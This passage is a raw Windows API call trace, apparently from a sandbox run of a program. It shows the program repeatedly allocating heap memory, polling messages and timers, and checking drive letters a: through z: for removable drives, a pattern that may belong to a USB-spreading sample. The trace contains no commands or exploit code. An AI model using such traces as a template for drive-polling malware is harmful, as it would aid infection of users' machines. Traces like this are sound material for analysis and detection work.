[0217.357] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.357] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.357] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.358] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0217.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.359] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0217.359] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0217.359] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.359] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.360] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.360] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0217.360] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0217.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.360] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.360] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.360] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.361] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.361] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.361] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.361] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.361] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.361] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.361] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.362] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.362] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.362] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.362] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.363] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.363] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.363] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.363] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.363] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.366] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.366] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.366] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.366] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.367] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.367] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.367] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.368] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.368] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.368] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.368] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.369] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.369] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0217.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.383] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.383] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.383] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.384] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.384] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.384] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0217.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0217.385] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0217.385] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.386] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.386] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.386] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.386] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.386] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.386] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0217.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.455] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.455] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.455] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.455] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.456] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.456] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.456] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.456] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.456] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.456] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.456] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.457] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.457] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.457] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.457] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.457] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.457] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.458] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.458] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.458] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.458] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.458] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.458] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.459] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.459] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.459] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.459] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.460] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.460] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.460] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.460] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0217.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0217.461] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0217.461] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.462] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.462] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0217.462] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0217.462] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.462] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.462] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.463] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.463] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.463] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.463] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.463] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.463] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.463] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.464] GetDriveTypeW 